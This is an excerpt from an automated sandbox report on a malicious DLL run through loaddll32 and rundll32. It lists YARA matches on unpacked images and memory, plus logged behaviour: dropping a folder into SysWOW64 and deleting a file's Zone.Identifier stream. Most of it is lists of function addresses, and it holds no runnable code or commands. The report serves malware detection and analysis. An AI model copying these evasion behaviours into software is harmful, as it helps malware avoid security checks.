                      Source: Yara matchFile source: 0.0.loaddll32.exe.1170000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.a02240.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.10e34a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.5c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.540000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1170000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.rundll32.exe.eb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.540000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1203908.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.1203908.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1170000.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1203908.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.1020000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.a02240.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.1170000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.10b0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.3b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.972240.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.972240.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.10e34a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1170000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.loaddll32.exe.1203908.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.913568790.0000000001020000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.939956990.0000000001170000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.930364249.00000000003B0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.913622906.00000000010CA000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.958610660.0000000001170000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.958778791.00000000011EB000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.939332319.00000000005C0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.939371192.000000000095A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.1030937060.0000000000DBA000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.989427479.00000000011EB000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.930427759.00000000009EA000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.904116541.00000000006AB000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.1031053353.00000000010B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.989393299.0000000001170000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000003.1139622922.0000000000FAB000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.914845954.0000000000540000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.940009942.00000000011EB000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.956837036.0000000001170000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.939031365.00000000011EB000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.1183917294.0000000000EB0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.956978658.00000000011EB000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000000.938967752.0000000001170000.00000040.00000010.sdmp, type: MEMORY

                      System Summary:

                      barindex
                      Source: IGidwJjoUs.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6888 -ip 6888
                      Source: C:\Windows\SysWOW64\rundll32.exeFile deleted: C:\Windows\SysWOW64\Cwisdx\vimpwfmepmyc.nyd:Zone.IdentifierJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Cwisdx\Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7A9F10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7A77B4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7AD530
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7A1DE0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7A3A90
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7BE3A1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7B0380
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7A6070
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7B10C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7A68B0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7AA890
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E7AE890
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E7A9F10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E7A77B4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E7AD530
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E7A1DE0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E7A3A90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E7BE3A1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E7B0380
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E7A6070
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E7B10C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E7A68B0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E7AA890
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_6E7AE890
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0103EA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01041291
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0103970A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0103E10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0103590E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01033D0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0103BF0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0102CB13
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01024D1E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01039124
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0102A92F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0103CD35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0102F73B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01036540
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0102BD61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0102CF6E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01040370
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01033782
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01028D80
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01024B81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0103DB87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0102358B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01031591
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0102B191
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01027795
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_010389A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0103E5A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0103DDA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01030BA4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0103E3B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_010385B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_010243BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_010259BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0103D7BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_010219C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_010275D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0102A3E7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0103EDED
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_010251EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0103C205
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0102800A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0104261E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01029824
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01023228
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0103282D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01023432
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0102243F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01033043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0102AE43
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01037445
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0102AA4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0102544C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01026453
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0102CE5A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0102EE60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0102B464
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01026869
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01023A6C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0103B677
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0102FA78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0102387F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0102A083
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0102F48A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01030A93
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0103CE90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01030E97
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0103A29B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0103009A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0103E899
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0102FE9D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01022CC2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_010292C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_010420CE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_010310CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_010352D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_010290D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_010328D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01041CDB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0102C0EA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_010356E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_010284F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_010362F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01034CF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_010246FA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01021EFB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_010340FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003CEA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003D1291
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003B243F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003B3432
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003C282D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003B3228
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003B9824
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003D261E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003B800A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003CC205
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003BFA78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003B387F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003CB677
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003B6869
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003B3A6C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003BEE60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003BB464
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003BCE5A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003B6453
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003BAA4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003B544C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003BAE43
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003C7445
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003C3043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003CE899
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003BFE9D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003C009A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003CA29B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003C0E97
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003CCE90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003C0A93
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003BF48A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003BA083
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003B1EFB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003B46FA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003C40FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003C62F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003C4CF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003B84F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003BC0EA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003C56E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003D1CDB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003C28D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003C52D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003B90D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003C10CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003D20CE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003B2CC2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003B92C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003BF73B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003CCD35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003BA92F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003C9124
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003B4D1E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003BCB13
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003C3D0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003CBF0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003C590E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003C970A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003CE10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003D0370
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003BCF6E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003BBD61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003C6540
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003CD7BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003C85B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003B59BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003B43BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003CE3B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003C0BA4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003CDDA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003CE5A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003C89A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003BB191
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003C1591
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003B7795
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003B358B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003B4B81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003CDB87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003B8D80
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003C3782
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003CEDED
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003B51EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003BA3E7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003B75D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_003B19C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005DEA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005E1291
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005CCE5A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005C6453
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005C544C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005CAA4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005D7445
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005D3043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005CAE43
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005C387F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005CFA78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005DB677
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005C3A6C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005C6869
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005CB464
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005CEE60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005E261E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005C800A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005DC205
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005C243F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005C3432
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005D282D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005C3228
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005C9824
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005E1CDB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005C90D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005D28D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005D52D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005E20CE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005D10CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005C92C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005C2CC2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005D40FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005C46FA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005C1EFB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005D62F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005D4CF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005C84F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005D56E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005CC0EA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005CFE9D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005DE899
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005DA29B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005D009A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005D0E97
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005DCE90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005D0A93
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005CF48A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005CA083
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005D6540
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005E0370
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005CCF6E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005CBD61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005C4D1E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005CCB13
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005D3D0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005DBF0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005D590E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005D970A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005DE10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005CF73B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005DCD35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005CA92F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005D9124
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005C75D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005C19C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005DEDED
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005C51EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005CA3E7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005C7795
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005D1591
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005CB191
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005C358B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005DDB87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005C8D80
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005C4B81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005D3782
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005C43BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005C59BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005DD7BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005D85B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005DE3B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005DDDA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005D0BA4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005DE5A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_005D89A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010CEA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010D1291
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010C3D0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010CBF0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010C590E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010C970A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010CE10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010B4D1E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010BCB13
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010BA92F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010C9124
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010BF73B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010CCD35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010C6540
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010BCF6E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010BBD61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010D0370
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010B358B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010B4B81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_010CDB87
